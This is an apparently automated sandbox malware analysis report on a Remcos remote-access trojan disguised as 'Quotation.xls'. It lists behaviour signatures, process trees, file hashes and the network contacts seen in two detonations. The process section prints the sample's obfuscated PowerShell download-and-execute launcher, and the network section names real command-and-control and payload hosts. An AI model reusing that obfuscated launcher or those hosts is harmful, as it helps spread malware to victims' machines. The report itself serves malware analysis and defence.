Malware Analysis Report

2025-01-02 03:28

Sample ID: 240724-mjzmra1fpr
Target: Quotation.xls
SHA256: c0484101a8ad9d96190d39f100d6a6ed337873df68eb587c74a91b5cdd19cdd5
Tags: remcos 2556 defense_evasion discovery execution phishing rat
Score: 10/10

Analysis Overview

Score: 10/10

SHA256: c0484101a8ad9d96190d39f100d6a6ed337873df68eb587c74a91b5cdd19cdd5

Threat Level: Known bad

The file Quotation.xls was found to be: Known bad.

Malicious Activity Summary

remcos 2556 defense_evasion discovery execution phishing rat

Remcos

Process spawned unexpected child process

Evasion via Device Credential Deployment

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Suspicious use of SetThreadContext

Detected phishing page

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

Uses Volume Shadow Copy service COM API

Uses Task Scheduler COM API

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy WMI provider

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-07-24 10:30

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-07-24 10:30
Reported: 2024-07-24 10:33
Platform: win7-20240704-en
Max time kernel: 148s
Max time network: 155s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls

Signatures

Remcos

rat remcos

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\winiti.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1108 set thread context of 2884 | N/A | C:\Users\Admin\AppData\Roaming\winiti.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

Detected phishing page

phishing

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2904 wrote to memory of 2608 (4 events) | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2608 wrote to memory of 2760 (4 events) | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 1652 (4 events) | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1652 wrote to memory of 2232 (4 events) | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2760 wrote to memory of 1108 (4 events) | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\winiti.exe
PID 1108 wrote to memory of 2884 (16 events) | N/A | C:\Users\Admin\AppData\Roaming\winiti.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'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'+[chAR]0x22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'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'+[chAR]0x22+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wrr7nadr.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF22.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCF12.tmp"

C:\Users\Admin\AppData\Roaming\winiti.exe

"C:\Users\Admin\AppData\Roaming\winiti.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 tny.wtf udp
US 172.67.156.72:80 tny.wtf tcp
US 192.3.118.15:80 192.3.118.15 tcp
US 172.67.156.72:80 tny.wtf tcp
US 192.3.118.15:80 192.3.118.15 tcp
US 107.173.143.46:80 107.173.143.46 tcp
US 8.8.8.8:53 bossnacarpet.com udp
US 173.255.204.62:2556 bossnacarpet.com tcp
US 8.8.8.8:53 vegetachcnc.com udp
US 107.173.4.18:2556 vegetachcnc.com tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NFAY0EOS\gdfc[1].hta

MD5 5c8152c47be9ca7a398a85d2e51b2505
SHA1 34eeba07fe8667b81f14be825223b26006d7d042
SHA256 ec3c6a6050bd2e48b86fa5c770b78963ed6f13f5adbd9e96ce86dd81e27ab3cd
SHA512 8f4cf39c381f68cb3fe3230823b7a96d2808bae4ec3e44c7a2bd90946264da74736fae170cc0f471049b6e4d5ea9b9518f45a078a191ba401ad7b6d8321bae4a

\??\c:\Users\Admin\AppData\Local\Temp\wrr7nadr.cmdline

MD5 b747cdd0ffea5c8ddf7131e17823747f
SHA1 41a278eddce8b4771d5b42be18cac33331d2d792
SHA256 d6caa87edcd6c6751870a20178feeae84a47f104537deb1d22571441a9ae16cf
SHA512 826600fa32ebd9e6fdff00288c2ab0805dd38dc604b4d8835bf148da66711daa7ab5468f92c4b91b39b65f88d1396d65d9d9fcf70703e0de89ff4029dff807a1

\??\c:\Users\Admin\AppData\Local\Temp\wrr7nadr.0.cs

MD5 a83dc0e46bbad233951be9e3fdba130c
SHA1 892cfc6827bb1072ec2e26bbf83457497d6a17cb
SHA256 aa9a30262c1a7f73a50a10094b1c5eef9584cd05d275b2ed57430b3431aef967
SHA512 e02ef7f32d36925b4064b283c5dfe49b2db6fe0df092be7e3e4b3ba6501b840f4d7d86732f63dc4564514e8aef810edc40b42c982b9fb8356b2e5ab6fe580caa

\??\c:\Users\Admin\AppData\Local\Temp\CSCCF12.tmp

MD5 03a5865dc15c5d0f43ced1aee7a8d16e
SHA1 81458a58ad5a09f87c5d7b15e4c02dd7a5166555
SHA256 be1ac8c1b9aebfbe284e5ecd496a0b3322dddd159517c2d7c34770d179ba269f
SHA512 a74181241d37ac5c91766c1122c89cb9bd2e12c24f977fa90ff57b7e5f5fe1f127f8f7182fdd8eee6a3466232dfcec16a68e152c0ef18c15ca265ff8b3fdb428

C:\Users\Admin\AppData\Local\Temp\RESCF22.tmp

MD5 35c7d65fd3c27e01c9579b744902459c
SHA1 36491adf9dccab029e8da529632e88fe6d9fab55
SHA256 7b1d94b818cd392846cff1ce027e9fdc66430ef99ee4dbad38f77ab8472dd957
SHA512 28cc5a69bb7fca63d1b3de271716ef54affe377712cffd878ae14ed1184c2b7fb60ed514de134f1f753bf734cfb0e9f2dfd9930b6868b74d69c46edd0cef844a

C:\Users\Admin\AppData\Local\Temp\wrr7nadr.dll

MD5 930f55e4011c2193939d376948c305ad
SHA1 06464223e8a3f1074a858d66f5308c9115639691
SHA256 077694a40703c99a0abc8f1dd04de38912a09c4e9a8e937f6c07cf1b221ffcec
SHA512 e78f11bf5a8b4a4124769fed5c2f5cfc2b1506412fd9e5f40bb4ef6b1bec7c9522f8cf84a739171b42031e3ec10edfa6ae2b97f8194aa6554ef9de7fdd9056c1

C:\Users\Admin\AppData\Local\Temp\wrr7nadr.pdb

MD5 d861d056a5c35a467b54b45eec5b3f39
SHA1 e4e34e26d1800c8b57cffe70c8a3150c29c62162
SHA256 5ea37039bff6e70ee7d2db0a8e996bd571b3246d6e4e8da21abb3f641921e4a1
SHA512 0fc597035a4ccd1c893c5ca30cc3254e0639acfe60e2159128ce68e5cb4942fc2f9d65fda27072d2739e840999ef47e644437868b120c570a398903d87d3dbe4

C:\Users\Admin\AppData\Roaming\winiti.exe

MD5 f6bf8ada032d17192526ffebb48aed79
SHA1 362cb802e430115288638c9d613f00412f1b2519
SHA256 153e11471f85de3df5135b0445014698333ff40a9d6c488d291d6517eb19800d
SHA512 0a2e5dbcc972d8463a3cd0608bb837e232ed1dd909ea7472ade269abb0ae1d9dfbeecefe505caffabefed02af413ee156aa2917f0ac3547f1431183bfa99639c

Analysis: behavioral2

Detonation Overview

Submitted: 2024-07-24 10:30
Reported: 2024-07-24 10:33
Platform: win10v2004-20240709-en
Max time kernel: 143s
Max time network: 133s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Quotation.xls"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Detected phishing page

phishing

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1628 wrote to memory of 3688 (2 events) | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Quotation.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 tny.wtf udp
US 104.21.40.183:80 tny.wtf tcp
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 192.3.118.15:80 192.3.118.15 tcp
US 8.8.8.8:53 183.40.21.104.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 15.118.3.192.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 0e7ee9deb29b355cd65ec941d250191e
SHA1 e9e0abd1e852a87b62599092ec99ff20e3baf211
SHA256 af21a14f64edb0dd0499a6b7e7c031d039f61438c78d742479d33f94e040fa81
SHA512 9d0fa54e29a5c5db95cd21893420b6923618c949cf7dc6d4547ec718993dc70c84c8209c46dc14b2f55eceb81d8070b92db8229f277d16b457f3d078f91ad187
